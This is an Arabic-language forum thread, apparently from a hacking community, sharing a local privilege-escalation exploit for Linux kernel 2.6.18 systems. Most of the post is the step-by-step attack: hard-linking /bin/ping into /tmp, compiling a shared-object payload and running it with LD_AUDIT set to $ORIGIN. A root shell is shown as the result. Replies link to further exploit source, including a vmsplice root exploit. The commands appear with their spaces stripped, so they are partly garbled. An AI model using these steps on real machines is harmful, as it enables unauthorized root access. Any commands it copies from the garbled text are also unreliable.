Local 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:09:20 EDT 2010 i686 athlon i386

[b]السلام عليكم

الثغرة واضحة

وهي تعتمد على ln /bin

ترقيعها واضح ايضا وهو تصريح tmp 644 و bin[/b]

mkdir/tmp/x
ln/bin/ping/tmp/x/t
exec3</tmp/x/t
ls-l/proc/$$/fd/3
lr-x------1ahokaahoka64Oct1822:30/proc/3042/fd/3->/tmp/x/t
rm-rf/tmp/x
ls-l/proc/$$/fd/3
lr-x------1ahokaahoka64Oct1822:30/proc/3042/fd/3->/tmp/x/t(deleted)
vipayload.c
gcc-w-fPIC-shared-o/tmp/xpayload.c
ls-l/tmp/x
-rwxrwxr-x1ahokaahoka4224Oct1822:32/tmp/x
LD_AUDIT="\$ORIGIN"exec/proc/self/fd/3
root@localhost~]#whoami
root
root@localhost~]#id
uid=0(root)gid=502(ahoka)groups=502(ahoka)context=user_u:system_r:unconfined_t
root@localhost~]#uname-a
Linuxlocalhost.localdomain2.6.18-194.11.4.el5#1SMPTueSep2105:09:20EDT2010i686athloni386GNU/Linux

[b]رابط الثغرة

http://pastebin.com/wTQDin9y

ddd
[/b]

وممكن احد يجرب هذا لانه يقولون 2011 ddd

http://security-tr.blogspot.com/2011/01/2618-2011-local-root-exploit.html

old

http://www.exploit-db.com/exploits/5092

شكرا لك بس مكرار

http://www.sec4ever.com/home/showthread.php?t=5429

هذا السورس http://www.marsaud.org/divers/vmsplice-local-root-exploit.c

وهذي الثغرة ضهرت في 2008